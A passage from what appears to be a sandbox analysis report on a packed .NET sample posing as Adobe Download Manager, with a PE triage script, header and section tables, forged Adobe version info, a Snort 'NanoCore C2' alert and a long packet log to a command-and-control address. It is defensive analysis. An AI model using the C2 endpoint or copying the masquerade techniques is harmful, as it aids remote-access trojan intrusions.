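    coff = struct.pack("<HHIIIHH", 0x014C, 3, 0xBB2F66FF, 0, 0, 0xE0, 0x010E)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x7583E)     # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)    # ImageBase
    struct.pack_into("<H", opt, 68, 2)           # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, 0x8540)      # DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE
    secs = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in (
            (b".text", 0x2000, 0x73844, 0x73A00, 0x60000020),
            (b".rsrc", 0x76000, 0x2CA0, 0x2E00, 0x40000040),
            (b".reloc", 0x7A000, 0xC, 0x200, 0x42000040)))
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + secs


if __name__ == "__main__":
    for key, value in triage(build_constructed_header()).items():
        print(f"{key}: {value}")
```

Against a real file, pass the bytes from open(path, "rb").read(); the returned section table is what you would slice the file with to reproduce the per-section entropy in the Sections table below (7.985 over .text here, which is the packed managed payload, not compiler output). A future timestamp is cheap to forge and cheap to check, so it belongs in static triage alongside the double extension and the Adobe version resource.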

                              Entrypoint Preview

                               Instruction
                               jmp dword ptr [00402000h]
                               (The rest of the preview is zero padding, which the disassembler renders as 97 repetitions of "add byte ptr [eax], al". 0x402000 is the image's single IAT slot, IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, size 0x8, i.e. mscoree.dll!_CorExeMain, the only import: this is the standard .NET loader stub, and all real logic lives in the managed code in .text.)

                              Data Directories

                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x757f0 | 0x4b | .text
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x2ca0 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0xc | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x2000 | 0x73844 | 0x73a00 | False | 0.979803631757 | data | 7.98540121704 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                               .rsrc | 0x76000 | 0x2ca0 | 0x2e00 | False | 0.146654211957 | data | 3.25857363406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0x7a000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                               Name | RVA | Size | Type | Language | Country
                               RT_ICON | 0x76130 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512 | |
                               RT_GROUP_ICON | 0x786d8 | 0x14 | data | |
                               RT_VERSION | 0x786ec | 0x3c8 | data | |
                               RT_MANIFEST | 0x78ab4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                              Imports

                               DLL | Import
                               mscoree.dll | _CorExeMain

                              Version Infos

                               Description | Data
                               Translation | 0x0000 0x04b0
                               LegalCopyright | Copyright 2019 Adobe Inc. All rights reserved.
                               Assembly Version | 2.0.0.592
                               InternalName | topA1.exe
                               FileVersion | 2.0.0.592
                               CompanyName | Adobe Inc
                               LegalTrademarks |
                               Comments | Adobe Download Manager
                               ProductName | Adobe Download Manager
                               ProductVersion | 2.0.0.592
                               FileDescription | Adobe Download Manager
                               OriginalFilename | topA1.exe

                              Network Behavior

                              Snort IDS Alerts

                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                               08/03/21-08:27:54.228892 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49771 | 2018 | 192.168.2.4 | 217.138.212.57

                              Network Port Distribution

                              TCP Packets

                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Aug 3, 2021 08:27:53.016474009 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:54.099281073 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:54.101644993 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:54.228892088 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:55.107541084 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:55.107676983 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:55.147273064 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:55.147423983 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:55.782269001 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:55.784817934 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:56.438827991 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:56.494590044 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:56.504901886 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.155390024 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.183080912 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.184142113 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.184262991 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.184508085 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.184701920 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.184794903 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.185137033 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.185631037 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.185904026 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.186058044 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.188045025 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.188126087 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.188519955 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.188623905 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.189238071 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.809499025 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.809520006 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.809655905 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.810545921 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.810564041 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.810681105 CEST | 49771 | 2018 | 192.168.2.4 | 217.138.212.57
                               Aug 3, 2021 08:27:57.811285973 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                               Aug 3, 2021 08:27:57.811305046 CEST | 2018 | 49771 | 217.138.212.57 | 192.168.2.4
                              Aug 3, 2021 08:27:57.811395884 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.812160015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813565016 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813584089 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.813677073 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.814728975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.814750910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815210104 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815228939 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.815304041 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.815321922 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.816252947 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818298101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818317890 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818346977 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818797112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818813086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.818877935 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.818905115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:57.820180893 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.820815086 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:57.821829081 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422130108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422149897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422337055 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.422650099 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422662020 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.422801018 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.437520027 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.437534094 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438402891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438420057 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438431978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438498020 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.438925982 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438940048 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.438987970 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.440114021 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441627979 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.441709995 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442107916 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442585945 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.442933083 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.442966938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443496943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443511963 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.443984985 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444008112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.444041967 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.444176912 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.446219921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446244001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446711063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.446732044 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447354078 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447375059 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.447443962 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447463989 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.447467089 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.448440075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449229002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449248075 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.449352980 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.449367046 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.450615883 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.450647116 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.450998068 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.451433897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.451455116 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.451522112 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.454077005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.455230951 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.455250978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456259012 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.456295967 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456695080 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456707954 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.456800938 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:58.457701921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.457715034 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:58.457784891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.038724899 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041696072 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041709900 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.041829109 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.042579889 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.042597055 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.042670965 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.043169975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.043184042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.043334007 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.046055079 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.049640894 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.052726984 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.052743912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.052934885 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.054372072 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.054419041 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.054567099 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.063199043 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.064603090 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065483093 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.065821886 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065836906 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065891981 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.066371918 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.066386938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.066426039 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.077778101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078032017 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078409910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078520060 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.079093933 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.079142094 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.081734896 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.082555056 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.082652092 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.082981110 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.083653927 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.084119081 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.084916115 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.085508108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086100101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086167097 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.086221933 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086343050 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.087347031 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.087536097 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.087618113 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.089523077 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.089540005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.089968920 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.098397970 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098412991 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098985910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098999023 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099056959 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.099081993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.099597931 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099612951 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099895000 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.100095987 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.103764057 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.103835106 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.103871107 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.104306936 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.104320049 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.104360104 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.104832888 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105021954 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.105278015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105370998 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105443001 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.105597973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.150897026 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.686285973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.686419010 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687150002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687423944 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687478065 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.687499046 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.688621998 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.689125061 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.689378023 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.692122936 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.704193115 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706058025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706213951 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.706401110 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706497908 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.707607985 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708050966 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708290100 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.708827972 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708944082 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.713366985 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.717955112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.718653917 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.718959093 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.719105005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.719156981 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.721807003 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.723269939 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.724567890 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.724706888 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.726097107 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.733216047 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.733546019 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.742741108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.743761063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.743915081 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.744151115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.744563103 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.745119095 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.746093988 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.746196985 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.746225119 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.746279001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750252962 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750288963 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750313997 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750437975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750720978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750804901 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.750828028 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.750830889 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.751275063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.751403093 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.752629042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.753504038 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.753665924 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.754075050 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.754702091 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.755228043 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.756278992 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.756289005 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.756357908 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.756571054 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.758263111 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.758595943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.758878946 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.759166002 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.759203911 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.759354115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.759560108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.760149002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.760818958 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.761168003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.809087992 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.311570883 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.312720060 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313015938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313277960 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313358068 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.313386917 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.313661098 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.314306974 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.316323996 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.322700024 CEST201849771217.138.212.57192.168.2.4
